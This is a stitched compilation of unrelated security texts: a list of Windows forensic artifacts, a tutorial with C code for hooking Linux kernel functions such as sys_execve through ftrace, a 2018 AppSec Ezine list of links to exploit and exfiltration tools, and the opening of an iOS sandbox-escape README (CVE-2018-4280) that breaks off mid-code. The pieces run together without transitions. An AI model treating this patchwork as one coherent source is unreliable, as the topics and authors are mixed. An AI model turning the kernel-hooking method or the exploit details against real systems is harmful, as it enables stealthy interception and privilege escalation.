https://github.com/MarkBaggett/srum-dump

ActivitiesCache.db

In Windows 10 1803 (April 2018) Update, Microsoft introduced the Timeline feature, and all forensicators did rejoice. This artifact is a goldmine for user activity analysis and the associated data is stored within an ActivitiesCache.db located within each users profile.

References/Tools:
https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
https://binaryforay.blogspot.com/2018/05/introducing-wxtcmd.html

Security Log (592/4688)

Event IDs 592 (Windows XP/2003) and 4688 (everything since) are recorded within the Security log on process creation, but only if Audit Process Creation is enabled.

References/Tools:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=592
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4688

System Log (7035)

Event ID 7035 within the System event log is recorded by the Service Control Manager when a Service starts or stops. As such it can be an indication of execution if the associated process is registered as a service.

References/Tools:
http://www.eventid.net/display-eventid-7035-source-Service%20Control%20Manager-eventno-1530-phase-1.htm

UserAssist

Within each users NTUSER.DAT the UserAssist key tracks execution of GUI applications.

References/Tools:
https://www.4n6k.com/2013/05/userassist-forensics-timelines.html
https://blog.didierstevens.com/programs/userassist/
https://www.nirsoft.net/utils/userassist_view.html

RecentApps

The RecentApps key is located in the NTUSER.DAT associated with each user and contains a record of their… Recent Applications. The presence of keys associated with a particular executable evidence the fact that this user ran the executable.

References/Tools:
https://df-stream.com/2017/10/recentapps/

JumpLists

Implemented in Windows 7, Jumplists are a mechanism by which Windows records and presents recent documents and applications to users. Located within individual users profiles the presence of references to executable(s) within the ‘Recent\AutomaticDestinations’ can be used to evidence the fact that they were run by the user.

References/Tools:
https://articles.forensicfocus.com/2012/10/30/forensic-analysis-of-windows-7-jump-lists/
https://www.blackbagtech.com/blog/2017/01/12/windows-10-jump-list-forensics/
https://ericzimmerman.github.io/#!index.md

RunMRU

The RunMRU is a list of all commands typed into the Run box on the Start menu and is recorded within the NTUSER.DAT associated with each user. Commands referencing executables can be used to determine if, how and when the executable was run and which user account was associated with running it.

References/Tools:
http://www.forensicfocus.com/a-forensic-analysis-of-the-windows-registry
http://what-when-how.com/windows-forensic-analysis/registry-analysis-windows-forensic-analysis-part-8/

AppCompatFlags Registry Keys

References/Tools:
https://journeyintoir.blogspot.com/2013/12/revealing-program-compatibility.html

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is an ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These kernel options insert the call of a special tracing function — mcount() or __fentry__() — at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures — dynamic ftrace. If ftrace isn’t in use, it nearly doesn’t affect the system because the kernel knows where the calls mcount() or __fentry__() are located and replaces the machine code with nop (a specific instruction that does nothing) at an early stage. And when Linux kernel trace is on, ftrace calls are added back to the necessary functions.

Description of necessary functions

The following structure can be used for describing each hooked function:

 

/**
 * struct ftrace_hook    describes the hooked function
 *
 * @name:                the name of the hooked function
 *
 * @function:            the address of the wrapper function that will be called instead
 *                       of the hooked function
 *
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 *
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 *
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
 */
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;
        unsigned long address;
        struct ftrace_ops ops;
};

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:

 

#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
        }
static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),
};

This is what the hooked function wrapper looks like:

/*
 * It’s a pointer to the original system call handler execve().
 * It can be called from the wrapper. It’s extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to “asmlinkage”).
 */
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);
/*
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
 */
static asmlinkage long fh_sys_execve (const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address (struct ftrace_hook *hook)
        hook->address = kallsyms_lookup_name(hook->name);
        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        }
        *((unsigned long*) hook->original) = hook->address;
        return 0;
}

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

 int fh_install_hook (struct ftrace_hook *hook)
        int err;
        err = resolve_hook_address(hook);
        if (err)
                return err;
        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;
        /* ... */
}

The fh_ftrace_thunk () feature is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking — they command ftrace to save and restore the processor registers whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

 int fh_install_hook (struct ftrace_hook *hook)
{
        /* ... */
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        }
        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);
                /* Don’t forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
                return err;
        }
        return 0;
}

To turn off the hook, we repeat the same actions in reverse:

 void fh_remove_hook (struct ftrace_hook *hook)
{
        int err;
        err = unregister_ftrace_function(&hook->ops);
        if (err)
                pr_debug("unregister_ftrace_function() failed: %d\n", err);
        }
        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
        }
}

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

 static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        regs->ip = (unsigned long) hook->function;
}

We get the address of struct ftrace_hook for our function using a macro container_of() and the address of struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with a disabled preemption (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will only point inside our wrapper. You should pass control only during the first function call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk (unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;
}

This approach has three main advantages:

  • Low overhead costs. You need to perform only several comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command Is in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suggest that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Linux Kernel Function Tracing hooking

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel accomplishes all low-level tasks implemented on the assembler pretty fast and hands over control to the high-level do_syscall_64 () function, which is written in C. This function reaches the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve ().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, there’s no such call.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Following the FTRACE_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip — a pointer to the next executed function — which leads to passing control to a new address.
  7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and returns control to the do_syscall_64() function.
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.

Conclusion

Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that ’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. There are several kernel requirements needed to ensure successful ftrace Linux kernel tracing:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead costs than kprobes. However, the overhead costs are higher than for splicing manually. In fact, dynamic ftrace is a variation of splicing which executes the unneeded ftrace code and other callbacks.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead costs and can disrupt the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction) so you can basically spring over ftrace.

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:

  • CONFIG_FTRACE
  • CONFIG_KALLSYMS

Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:

  • CONFIG_DYNAMIC_FTRACE_WITH_REGS

To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:

  • CONFIG_HAVE_FENTRY

While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support a 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but it’ll significantly boost the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

According to debugging, the system got stuck inside the hooked function. For some unknown reason, the parent_ip still pointed to the kernel instead of the function wrapper when calling the original function inside the ftrace callback. This launched an endless loop wherein ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;
}

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls are expanded into no-op. This printk-macro version is used for logging at the development stage. And since these logs pose no interest at the operating stage, the system simply cuts them out of the code automatically unless you activate the DEBUG macro. After that, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        return real_sys_execve(filename, argv, envp);
}

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace a function call instruction with a cheaper direct jump to the function’s body. This is what this call looks like in machine code:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq </fh_sys_execve>

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax </fh_sys_execve>

The first CALL instruction is the exact same __fentry__() call that the compiler inserts at the beginning of all functions. But after that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve call (via a pointer stored in memory) performed by the CALL instruction, which is followed by fh_sys_execve() with the help of the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize(«-fno-optimize-sibling-calls»)

For further hooking experiments, you can use the full kernel module code from GitHub.

Conclusion

While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.

AppSec Ezine — 243rd Edition

 █████╗ ██████╗ ██████╗ ███████╗███████╗ ██████╗    ███████╗███████╗██╗███╗   ██╗███████╗
██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔════╝██╔════╝    ██╔════╝╚══███╔╝██║████╗  ██║██╔════╝
███████║██████╔╝██████╔╝███████╗█████╗  ██║         █████╗    ███╔╝ ██║██╔██╗ ██║█████╗  
██╔══██║██╔═══╝ ██╔═══╝ ╚════██║██╔══╝  ██║         ██╔══╝   ███╔╝  ██║██║╚██╗██║██╔══╝  
██║  ██║██║     ██║     ███████║███████╗╚██████╗    ███████╗███████╗██║██║ ╚████║███████╗
╚═╝  ╚═╝╚═╝     ╚═╝     ╚══════╝╚══════╝ ╚═════╝    ╚══════╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝
### Week: 41 | Month: October | Year: 2018 | Release Date: 12/10/2018 | Edition: #243 ###


'  ╔╦╗┬ ┬┌─┐┌┬┐  ╔═╗┌─┐┌─┐
'  ║║║│ │└─┐ │   ╚═╗├┤ ├┤ 
'  ╩ ╩└─┘└─┘ ┴   ╚═╝└─┘└─┘
'  Something that's really worth your time!


URL: https://blog.sheddow.xyz/css-timing-attack/
Description: A timing attack with CSS selectors and Javascript.

URL: http://www.sec-down.com/wordpress/?p=809
Description: An interesting Google vulnerability that got me 3133.7 reward.

URL: http://bit.ly/2OQkWuJ (+)
Description: Get as image() pulls Insights/NRQL data from New Relic accounts (IDOR).


'  ╦ ╦┌─┐┌─┐┬┌─
'  ╠═╣├─┤│  ├┴┐
'  ╩ ╩┴ ┴└─┘┴ ┴
'  Some Kung Fu Techniques.


URL: https://github.com/hdm/mac-ages
Description: MAC address age tracking.

URL: https://github.com/nulpwn/WiPray
Description: Wifi Password Spray in EAP-MSCHAPv2 networks.

URL: https://github.com/hausec/ADAPE-Script
Description: Active Directory Assessment and Privilege Escalation Script.

URL: https://github.com/LewisArdern/eslint-plugin-angularjs-security-rules
Description: Rules for detecting security issues in Angular 1.x.

URL: https://github.com/samhaxr/TakeOver-v1
Description: Takeover script extracts CNAME record of all subdomains at once.

URL: https://github.com/blueudp/DorkMe
Description: Making easier the searching of vulnerabilities with Google Dorks.

URL: https://github.com/sdnewhop/sdwan-harvester
Description: SD-WAN Harvester - Automatically enumerate/fingerprint SD-WAN nodes.

URL: https://github.com/JackOfMostTrades/bluebox
Description: Automated Exploit Toolkit for CVE-2015-6095 and CVE-2016-0049.

URL: https://github.com/cobbr/SharpSploit
Description: SharpSploit is a .NET post-exploitation library written in C#.

URL: https://github.com/Cr4sh/fwexpl
Description: PC firmware exploitation tool and library.

URL: https://github.com/P1CKLES/SharpBox
Description: Tool for compressing, encrypt and exfil data to DropBox via API.

URL: https://github.com/chudel/openfender
Description: Quest One Identity Defender Soft Token to Google Auth QR Code Converter.


'  ╔═╗┌─┐┌─┐┬ ┬┬─┐┬┌┬┐┬ ┬
'  ╚═╗├┤ │  │ │├┬┘│ │ └┬┘
'  ╚═╝└─┘└─┘└─┘┴└─┴ ┴  ┴ 
'  All about security issues.


URL: https://flatkill.org/
Description: Flatpak - a security nightmare.

URL: http://bit.ly/2C601gF (+)
Description: Bitcoin Core Bug CVE-2018–17144 - An Analysis.

URL: https://geosn0w.github.io/Jailbreaks-Demystified/
Description: Jailbreaks Demystified.

URL: https://www.nc-lp.com/blog/disguise-phar-packages-as-images
Description: Disguise PHAR packages as images.

URL: http://bit.ly/2yxlRWY (+)
Description: Collecting Shells by the Sea of NAS Vulnerabilities.

URL: http://bit.ly/2NC71nl (+)
Description: PRTG Network Monitor Privilege Escalation (CVE-2018-17887).

URL: https://prdeving.wordpress.com/2018/09/21/hiding-malware-in-windows-code-injection/
Description: Hiding malware in Windows – The basics of code injection.

URL: https://ewilded.blogspot.pt/2018/01/vulnserver-my-kstet-exploit-delivering.html
Related: http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
Description: My KSTET exploit - Delivering the final shellcode via active server socket.

URL: http://bit.ly/2C9esjR (+)
Description: Authentication bypass vulnerability (W/PE) in WD My Cloud (CVE-2018-17153).

URL: https://alephsecurity.com/2018/01/22/qualcomm-edl-1/
Code: https://github.com/alephsecurity/edlrooter
Description: Exploiting Qualcomm EDL Programmers (CVE-2017-13174/CVE-2017-5947).

URL: http://0xeb.net/2018/03/using-z3-with-ida-to-simplify-arithmetic-operations-in-functions/
Description: Using Z3 with IDA to simplify arithmetic operations in functions.


'  ╔═╗┬ ┬┌┐┌
'  ╠╣ │ ││││
'  ╚  └─┘┘└┘
'  Spare time?


URL: http://telegra.ph/
Description: Write and Share!

URL: https://blog.bejarano.io/hardening-macos.html
Description: Hardening macOS.

URL: https://github.com/opsxcq/docker-tor-hiddenservice-nginx
Description: Easily setup a hidden service inside the Tor network.


'  ╔═╗┬─┐┌─┐┌┬┐┬┌┬┐┌─┐
'  ║  ├┬┘├┤  │││ │ └─┐
'  ╚═╝┴└─└─┘─┴┘┴ ┴ └─┘
'  Content Helpers (0x)

52656e61746f20526f64726967756573202d204073696d7073306e202d20687474703a2f2f706174686f6e70726f6a6563742e636f6d

Blanket is a sandbox escape targeting iOS 11.2.6

blanket

https://github.com/bazad/blanket

Blanket is a sandbox escape targeting iOS 11.2.6, although the main vulnerability was only patched in iOS 11.4.1. It exploits a Mach port replacement vulnerability in launchd (CVE-2018-4280), as well as several smaller vulnerabilities in other services, to execute code inside the ReportCrash process, which is unsandboxed, runs as root, and has the task_for_pid-allowentitlement. This grants blanket control over every process running on the phone, including security-critical ones like amfid.

The exploit consists of several stages. This README will explain the main vulnerability and the stages of the sandbox escape step-by-step.

Impersonating system services

While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
